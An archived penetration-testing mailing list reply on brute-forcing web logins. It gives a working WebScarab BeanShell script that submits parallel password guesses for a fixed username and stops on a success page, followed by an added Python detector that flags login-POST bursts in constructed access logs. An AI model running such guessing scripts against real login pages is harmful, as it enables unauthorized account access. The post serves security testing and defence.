Penetration Testing mailing list archives

Re: BruteForcing?


From: Rogan Dawes <discard () dawes za net>
Date: Wed, 18 Oct 2006 10:28:35 +0200

Troy Fletcher wrote:
Sparky,

For brute forcing WebPages, I use Perl scripts combined with Linux tools
like cURL and Wget. If you know any programming/scripting languages, I
can point you in the right direction. To help see the traffic exchange
for WebPage login attempts I recommend using a proxy like WebScarab;
once you see the POSTs or GETs, automating attacks with cURL is easy. I
don't know any _good_ pre-made WebPage bruteforce tools, but I'm sure
that if someone else does, they'll share.

WebScarab can also be used to brute force web pages, using the Scripted plugin. One major advantage to using WebScarab is that your attack is/can be multi-threaded automatically: WebScarab will attempt up to 4 simultaneous requests.

Here is a simple script that uses an existing request as a template (for URLs, methods, headers, etc.) and just replaces the request body. In my example, I'll take words from a predefined array, but the technique can very easily be extended to reading lines from a file.

The script language is BeanShell, which is very similar to Java (BeanShell can evaluate actual Java classes in "strict" mode).

// check the source (or the appendix in the online help) for the
// methods you can use on Request and Response
import org.owasp.webscarab.model.Request;
import org.owasp.webscarab.model.Response;

// This function/method is the main loop.
// You need to provide three methods that this function will invoke
//
// boolean hasMoreRequests() - if there are more requests to issue
// Request getNextRequest()  - the next request to submit
// void handleResponse(Response response) - allows you to do something
//                             with the responses obtained
//
void fetchParallel() {
    // while we have more requests to submit, or we are busy processing
    // the last requests sent off/waiting for a response
    while (hasMoreRequests() || scripted.isAsyncBusy()) {
        // while there are fewer than 4 outstanding requests
        // and we have more to try
        while (scripted.hasAsyncCapacity() && hasMoreRequests()) {
            scripted.submitAsyncRequest(getNextRequest());
        }
        // if there is a response waiting to be processed
        if (scripted.hasAsyncResponse()) {
            while (scripted.hasAsyncResponse()) {
                handleResponse(scripted.getAsyncResponse());
            }
        } else Thread.sleep(100);
    }
}

String[] words = new String[] {"word1", "word2", "word3", "word4"};
int nextWord = 0;
boolean stop = false;
// This gets a copy of the request with ID 53 from the past
// conversations. Adjust the ID to suit your particular situation.
Request template = scripted.getRequest(53);

boolean hasMoreRequests() {
    // keep going until the word list is exhausted, or a hit has been found
    return nextWord < words.length && !stop;
}

Request getNextRequest() {
    Request req = new Request(template); // make a copy
    String word = words[nextWord++]; // increment the counter
    out.println("Trying " + word);
    // Note that the content is always a byte array
    // you might also want to consider URLEncoding your words?
    // Also note that IF there is an existing Content-Length header
    // it will automatically be updated to match the length of the
    // content
    req.setContent(("username=joe&password=" + word).getBytes());
    return req;
}

void handleResponse(Response response) {
    byte[] content = response.getContent();
    if (response.getStatus().equals("200") && content != null) {
        String html = new String(content); // consider encoding?
        if (html.indexOf("successful")>-1) {
            // we're in! Save it for review
            scripted.addConversation(response);
            stop = true;
        }
    }
}

// start the main loop
fetchParallel();

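The script above issues up to four login attempts at a time and treats a 200 response as a candidate hit, so on the server side a dictionary attack shows up as a burst of POSTs to the login path from one source, regardless of the status codes returned. As an added example that is not part of the original post, the following Python script (my own, using constructed access-log lines in combined log format and a hypothetical /login path) flags any source that posts to the login form ten or more times within a thirty-second sliding window:

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample access-log lines in combined log format (not real traffic).
# 10.0.0.5 sends 12 POSTs to /login inside three seconds, four per second, which
# is the footprint a four-way parallel dictionary attack leaves in a server log.
# 192.0.2.10 is an ordinary user who mistypes a password once and then succeeds.
ATTACK_SECONDS = (1, 1, 1, 1, 2, 2, 2, 2, 3, 3, 3, 3)
SAMPLE_LOG = [
    '10.0.0.5 - - [18/Oct/2006:10:28:%02d +0200] "POST /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"'
    % sec
    for sec in ATTACK_SECONDS
] + [
    '192.0.2.10 - - [18/Oct/2006:10:27:50 +0200] "GET /login HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [18/Oct/2006:10:28:05 +0200] "POST /login HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [18/Oct/2006:10:28:40 +0200] "POST /login HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    'this line is not a valid log record',
]

# Combined log format: ip ident user [timestamp] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def parse_line(line):
    """Parse one combined-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def detect_login_bruteforce(lines, path="/login", window=timedelta(seconds=30), threshold=10):
    """Return {source_ip: peak_count} for every source that POSTed to `path`
    at least `threshold` times within any sliding `window`.

    The HTTP status is deliberately ignored: a rejected login commonly comes
    back as 200 with an error page, exactly the case the script above relies on.
    """
    records = [r for r in map(parse_line, lines) if r is not None]
    records.sort(key=lambda r: r["ts"])  # logs are usually ordered, but do not rely on it
    recent = defaultdict(deque)  # ip -> timestamps of POSTs still inside the window
    alerts = {}
    for rec in records:
        if rec["method"] != "POST" or rec["path"] != path:
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while rec["ts"] - q[0] > window:  # drop attempts that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            alerts[rec["ip"]] = max(alerts.get(rec["ip"], 0), len(q))
    return alerts


if __name__ == "__main__":
    for ip, count in detect_login_bruteforce(SAMPLE_LOG).items():
        print("ALERT %s: %d POST /login attempts within one window" % (ip, count))
```

Run against the constructed lines it reports only 10.0.0.5 with a peak of 12 attempts; the legitimate user's two POSTs are 35 seconds apart and never accumulate inside one window. Counting per source address is the cheapest signal, but it should be paired with per-account counting on the application side, since the same burst against one username is what a lockout or back-off policy needs to see.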


-----Original Message-----
From: listbounce () securityfocus com
[mailto:listbounce () securityfocus com]On Behalf Of 09sparky () gmail com
Sent: Sunday, October 15, 2006 12:03 PM
To: pen-test () securityfocus com
Subject: BruteForcing?


This is more of a general brute forcing question, but one with which I
could use some assistance.

[snip]
Second question: Brute forcing also, but against WebPages.  For example,
a Cisco 3000 VPN Concentrator, I have the webpage asking for
username/password.  How would I attempt to dictionary attack this?

Thanks,
Sparky


